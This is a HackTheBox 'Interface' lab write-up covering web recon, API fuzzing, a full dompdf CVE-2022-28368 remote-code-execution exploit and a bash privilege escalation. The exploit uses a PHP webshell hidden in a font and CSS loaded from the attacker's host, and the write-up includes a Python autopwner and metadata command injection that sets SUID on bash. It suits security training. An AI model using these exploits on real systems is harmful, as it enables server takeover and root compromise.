# Interface - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Interface is an excellent medium-rated HTB machine created by [irogir](https://app.hackthebox.com/users/476556)

The box starts with some API Fuzzing.  
To get user, we are expected to exploit a vulnerability in `dompdf`: CVE-2022-28368  
For root, we exploit extended test constructs in a bash script.

## Initial recon

```console
opcode@parrot$ nmap -v -p- --min-rate 2000 10.10.11.200
Nmap scan report for 10.10.11.200
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN Interface.nmap 10.10.11.200
Nmap scan report for 10.10.11.200
ost is up (0.18s latency).

PORT     STATE  SERVICE VERSION
22/tcp   open   ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72:89:a0:95:7e:ce:ae:a8:59:6b:2d:2d:bc:90:b5:5a (RSA)
|   256 01:84:8c:66:d3:4e:c4:b1:61:1f:2d:4d:38:9c:42:c3 (ECDSA)
|_  256 cc:62:90:55:60:a6:58:62:9e:6b:80:10:5c:79:9b:55 (ED25519)
80/tcp   open   http    nginx 1.14.0 (Ubuntu)
|_http-title: Site Maintenance
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Only the SSH SSH and HTTP ports are open.  
The webpage at <http://interface.htb/> is minimal and claims that some maintenance is going on:

![1](images/1.png)

Page source indicated that it has likely been built with NextJS.  
We also have a contact address there: `mailto:contact@interface.htb`

Hence, we can add this line to `/etc/hosts`:

```text
10.10.11.200 interface.htb
```

I could not find anything with `ffuf`, neither routes nor subdomains.  
Instead, if we look at the request with burp, we'd find an intriguing header:

```console
opcode@parrot$ curl -I interface.htb
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 08 May 2023 06:33:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 6359
Connection: keep-alive
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
X-Powered-By: Next.js
ETag: "i8ubiadkff4wf"
Vary: Accept-Encoding
```

The CSP header leaks another subdomain <http://prd.m.rendering-api.interface.htb>  
Therefore, we can update `/etc/hosts`:

```text
10.10.11.200 interface.htb prd.m.rendering-api.interface.htb
```

We get a 404 upon visiting this subdomain.

We can enumerate functional routes with `ffuf`:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://prd.m.rendering-api.interface.htb/FUZZ 2>/dev/null
.                       [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 88ms]
vendor                  [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 87ms]
```

We can enumerate further inside `/vendor`

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://prd.m.rendering-api.interface.htb/vendor/FUZZ 2>/dev/null
.                       [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 98ms]
dompdf                  [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 101ms]
composer                [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 87ms]
```

Inside `/vendor/composer`:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://prd.m.rendering-api.interface.htb/vendor/composer/FUZZ 2>/dev/null
LICENSE                 [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 96ms]
.                       [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 96ms]
```

Inside `/vendor/dompdf`:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/FUZZ 2>/dev/null
.                       [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 99ms]
dompdf                  [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 125ms]
```

Inside `/vendor/dompdf/dompdf`:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/FUZZ 2>/dev/null
lib                     [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 120ms]
.                       [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 90ms]
tests                   [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 84ms]
src                     [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 87ms]
VERSION                 [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 85ms]
.git                    [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 87ms]
.gitignore              [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 87ms]
.git/HEAD               [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 89ms]
```

The directory structure is similar to <https://github.com/dompdf/dompdf>. We would not find anything useful here.

After a hint, I learnt an important lesson: do not blindly trust status codes.  
If we were more insightful, we could have found another route:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://prd.m.rendering-api.interface.htb/FUZZ -mc all -fs 0 2>/dev/null
api                     [Status: 404, Size: 50, Words: 3, Lines: 1, Duration: 90ms]
.                       [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 91ms]
vendor                  [Status: 403, Size: 15, Words: 2, Lines: 2, Duration: 98ms]
```

They are both 404s, but `/api` returns a JSON response.

## API Fuzzing

Fuzzing the `/api` route further didn't yield any results:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://prd.m.rendering-api.interface.htb/api/FUZZ -mc all -fs 50 2>/dev/null
```

But since it is an API, we should also try POST requests:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/raft-small-words.txt -u http://prd.m.rendering-api.interface.htb/api/FUZZ -mc all -fs 50 -X POST 2>/dev/null
html2pdf                [Status: 422, Size: 36, Words: 2, Lines: 1, Duration: 113ms]
```

```console
opcode@parrot$ curl -X POST 'http://prd.m.rendering-api.interface.htb/api/html2pdf'
{"status_text":"missing parameters"}
```

We could fuzz for parameters with ffuf:

```console
opcode@parrot$ ffuf -c -w ~/wordlists/burp-parameter-names.txt -u http://prd.m.rendering-api.interface.htb/api/FUZZ -mc all -fs 36 -d '{"FUZZ": "opcode"}' 2>/dev/null
html                    [Status: 200, Size: 1133, Words: 117, Lines: 77, Duration: 113ms]
```

But linear search is inefficient. Instead we can use a binary search strategy to minimize the number of requests.  
The idea is to send all parameters in one request first and then split then into two groups and send them. The request which returns a positive response must contain our parameter. We can keep splitting them further until we isolate the parameter.

We can use Arjun (<https://github.com/s0md3v/Arjun>) for this:

```console
opcode@parrot$ git clone https://github.com/s0md3v/Arjun
opcode@parrot$ cd Arjun
opcode@parrot$ python3 setup.py install
```

After the installation, we can run it:

```console
opcode@parrot$ arjun -u http://prd.m.rendering-api.interface.htb/api/html2pdf -m JSON
    _
   /_| _ '
  (  |/ /(//) v2.2.1
      _/      

[*] Probing the target for stability
[*] Analysing HTTP response for anomalies
[*] Analysing HTTP response for potential parameter names
[+] Heuristic scanner found 3 parameters
[*] Logicforcing the URL endpoint
[✓] parameter detected: status_text, based on: param name reflection
[✓] parameter detected: html, based on: http code
[+] Parameters found: status_text, html
```

`status_text` is from when no parameters are specified. `html` is the parameter of interest.

## `dompdf` RCE: CVE-2022-28368

Now that we have found the parameter, we can make POST requests.  
The responses are PDF documents whose contents are controlled by the `html` parameter:

```console
opcode@parrot$ curl 'http://prd.m.rendering-api.interface.htb/api/html2pdf' -d '{"html":"opcode"}' --output output.pdf
```

![2](images/2.png)

HTML tags are honored as well:

```console
opcode@parrot$ curl 'http://prd.m.rendering-api.interface.htb/api/html2pdf' -d '{"html":"<b>opcode</b><br>lorem ipsum"}' --output output.pdf
```

![3](images/3.png)

Previously, we had discovered that `dompdf` was being used on the `prd.m.rendering-api` subdomain.  
Googling for "dompdf exploit", the first two results are <https://github.com/positive-security/dompdf-rce> and <https://www.optiv.com/insights/source-zero/blog/exploiting-rce-vulnerability-dompdf>

We can follow the instructions and try to exploit it.  
Basically, `dompdf` can be configured to access remote sites for images and CSS files as required. We can exploit this feature to inject malicious CSS files into `dompdf` and trick it into executing malicious PHP.

Step 1, we can download the `Lato-Regular.ttf` font and appended some PHP code at the end:

```console
opcode@parrot$ cp Lato-Regular.ttf Lato.php
opcode@parrot$ echo "<?php system('echo opcodewashere'); ?>" >> Lato.php
```

Then we can create `malicious.css`:

```css
@font-face {
    font-family:'Lato';
    src:url('http://10.10.14.75:8000/Lato.php');
    font-weight:'normal';
    font-style:'normal';
  }
```

We can host these two files with:

```console
opcode@parrot$ python3 -m http.server
```

Now, we can make a POST request to `/api/html2pdf`:

```console
opcode@parrot$ curl 'http://prd.m.rendering-api.interface.htb/api/html2pdf' -d '{"html":"<link rel=stylesheet href=\"http://10.10.14.75:8000/malicious.css\">"}' --output -
```

It responded with a PDF file:

```text
%PDF-1.7
1 0 obj
<< /Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R >>
endobj
2 0 obj
[--SNIP--]
startxref
610
%%EOF
```

We can calculate the md5 of our URL:

```console
opcode@parrot$ echo -n 'http://10.10.14.75:8000/Lato.php' | md5sum
b4a33e721c44f148142f7a8aef87b0bd  -
```

```console
opcode@parrot$ curl -s 'http://prd.m.rendering-api.interface.htb/vendor/dompdf/dompdf/lib/fonts/lato_normal_b4a33e721c44f148142f7a8aef87b0bd.php' --output - | tail
```

And we can get code execution just like that. You'd have to go over a wall of text to see the output.

After finishing the box, I also created an autopwner for this part in python, [dompdf-rce.py](dompdf-rce.py):

```py
from base64 import b64decode
from textwrap import dedent
from zipfile import ZipFile
from io import BytesIO
from http.server import HTTPServer, BaseHTTPRequestHandler
from hashlib import md5

from socket import socket, AF_INET, SOCK_DGRAM, inet_ntoa
from struct import pack
from fcntl import ioctl

import requests
import threading
import cmd


class WebshellPrompt(cmd.Cmd):
    prompt = "$ "

    def default(self, line):
        output = os_command(url, ip, port, font, line)
        print(output.decode(errors="ignore"))

    def do_exit(self, arg):
        return True


def get_font(font):
    r = requests.get(f"https://fonts.google.com/download?family={font}")
    font_zip = BytesIO(r.content)

    with ZipFile(font_zip, "r") as zipfp:
        content = zipfp.read(f"{font}-Regular.ttf")

    return content


def get_tun_ip():
    sock = socket(AF_INET, SOCK_DGRAM)
    packed_addr = ioctl(sock.fileno(), 0x8915, pack("256s", b"tun0"))[20:24]

    return inet_ntoa(packed_addr)


def inject_css(url, local_ip, local_port):
    html_payload = (
        f"<link rel=stylesheet href='http://{local_ip}:{local_port}/malicious.css'>"
    )
    payload = {"status_text": "OK", "html": html_payload}
    r = requests.post(f"{url}/api/html2pdf", json=payload, proxies=proxy)

    return r.content


def os_command(url, local_ip, local_port, font, command):
    local_url = f"http://{local_ip}:{local_port}/{font}.php"
    url_hash = md5(local_url.encode()).hexdigest()
    header = {"Accept-Language": command}

    url = f"{url}/vendor/dompdf/dompdf/lib/fonts/{font.lower()}_normal_{url_hash}.php"
    r = requests.get(f"{url}", headers=header, proxies=proxy)

    return r.content.split(b"__opcode__")[1].rstrip()


def host_payload(local_port, files):
    class HostHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            if self.path.lstrip("/") in files.keys():
                payload = files[self.path.lstrip("/")]
                content_type = "application/octet-stream"
            else:
                self.send_error(404, "Not Found")
                return

            self.send_response(200)
            self.send_header("Content-type", content_type)
            self.send_header("Content-Length", len(payload))
            self.end_headers()
            self.wfile.write(payload)

    httpd = HTTPServer(("", local_port), HostHandler)

    return httpd


if __name__ == "__main__":
    proxy = {}
    # proxy['http'] = 'http://127.0.0.1:8080'

    url = "http://prd.m.rendering-api.interface.htb"
    webshell_b64 = "PD9waHAgZWNobyAiX19vcGNvZGVfXyI7IHN5c3RlbSgkX1NFUlZFUltIVFRQX0FDQ0VQVF9MQU5HVUFHRV0pOyBlY2hvICJfX29wY29kZV9fIjsgPz4="
    font = "Lato"
    ip = get_tun_ip()
    port = "8000"

    requests.urllib3.disable_warnings()

    webshell = get_font(font) + b"\n" + b64decode(webshell_b64)

    files = {}
    files[f"{font}.php"] = webshell
    files["malicious.css"] = dedent(
    f"""
    @font-face {{
      font-family:'{font}';
      src:url('http://{ip}:{port}/{font}.php');
      font-weight:'normal';
      font-style:'normal';
    }}
    """
    ).encode()


    httpd = host_payload(int(port), files)
    httpd_thread = threading.Thread(target=httpd.serve_forever)
    httpd_thread.start()

    pdf = inject_css(url, ip, port)

    httpd.shutdown()
    httpd_thread.join()

    prompt = WebshellPrompt()
    prompt.cmdloop()
```

It works fine:

![4](images/4.png)

Still, it is not a proper shell. And it would only work until a cron job deletes the malicious font file.  
So I recommend switching to a more stable shell.

## Getting RCE with extended test construct (`[[ CONDITION ]]`) in bash

We can transfer `pspy` (<https://github.com/DominicBreuker/pspy>) to the box and look for cron jobs.  
You'd observe a bunch of cleanup processes first:

```log
2023/02/11 23:40:01 CMD: UID=0    PID=19806  | /usr/sbin/CRON -f 
2023/02/11 23:40:01 CMD: UID=0    PID=19805  | /usr/sbin/CRON -f 
2023/02/11 23:40:01 CMD: UID=0    PID=19807  | /bin/sh -c /root/clean.sh 
2023/02/11 23:40:01 CMD: UID=0    PID=19811  | find /var/www/api/vendor/dompdf/dompdf/lib/fonts/ -type f -cmin -5 -exec rm {} ; 
2023/02/11 23:30:01 CMD: UID=0    PID=19812  | cp /root/font_cache/dompdf_font_family_cache.php /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php 
2023/02/11 23:40:01 CMD: UID=0    PID=19813  | chown www-data /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php 
2023/02/11 23:40:01 CMD: UID=0    PID=19814  | chgrp www-data /var/www/api/vendor/dompdf/dompdf/lib/fonts/dompdf_font_family_cache.php 
```

Besides these, we'd also find suspicious processes:

```log
2023/02/11 23:28:01 CMD: UID=0    PID=19614  | /usr/sbin/CRON -f 
2023/02/11 23:28:01 CMD: UID=0    PID=19616  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/02/11 23:28:01 CMD: UID=0    PID=19615  | /bin/sh -c /usr/local/sbin/cleancache.sh 
2023/02/11 23:28:01 CMD: UID=0    PID=19618  | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/1d699b31ad6e032cc4b135eaabf4c0a7.pdf 
2023/02/11 23:28:01 CMD: UID=0    PID=19617  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/02/11 23:28:01 CMD: UID=0    PID=19619  | /bin/bash /usr/local/sbin/cleancache.sh 
2023/02/11 23:28:01 CMD: UID=0    PID=19623  | cut -d   -f1 
2023/02/11 23:28:01 CMD: UID=0    PID=19622  | /usr/bin/perl -w /usr/bin/exiftool -s -s -s -Producer /tmp/log.htm 
```

`/usr/local/sbin/cleancache.sh` also appears to be a cleanup script:

```bash
#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do

    if [[ -f "$cfile" ]]; then

        meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)

        if [[ "$meta_producer" -eq "dompdf" ]]; then
            echo "Removing $cfile"
            rm "$cfile"
        fi

    fi

done
```

`exiftool` didn't have any exploit that worked by abusing metadata.  
The `[[ "$meta_producer" -eq "dompdf" ]]` is the vulnerable part.  
We can get RCE if we control the variables inside extended test constructs. This page <https://www.vidarholen.net/contents/blog/?p=716> talks about the issue and has a functional payload.

But it wouldn't work "as-it-is" for us. Our payload would get `cut` if it contained spaces.  
We were expected to use a bash script to get around that issue.

First, generate any PDF file using their API:

```console
opcode@parrot$ curl 'http://prd.m.rendering-api.interface.htb/api/html2pdf' -d '{"html":"opcode"}' --output output.pdf
```

Immediately after, you'd see a PDF file being generated in `/tmp`. Copy it:

```console
www-data@interface:~$ cp /tmp/*.pdf /dev/shm/opcode.pdf
```

Now, create a malicious bash script:

```console
www-data@interface:~$ echo -e '#!/bin/bash\nchmod u+s /bin/bash' > /dev/shm/opcode.sh
www-data@interface:~$ chmod +x /dev/shm/opcode.sh
```

We can change the metadata next:

```console
www-data@interface:~$ exiftool -Producer='dom[$(/dev/shm/opcode.sh)]pdf' /dev/shm/opcode.pdf
```

Finally, transfer the doctored file to `/tmp`:

```console
www-data@interface:~$ cp /dev/shm/opcode.pdf /tmp/opcode.pdf
```

Now we can wait for the cron job, and after a while we'd find:

```console
www-data@interface:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1113504 Apr 18  2022 /bin/bash
```

Since the SETUID bit is set for bash binary, we can run it with `-p` option to get root shell.  
`-p` ensures that the effective user id is not dropped.

After getting the root shell, make sure to remove your files and remove the SETUID bit from bash:

```console
bash-4.4# chmod u-s /bin/bash
```
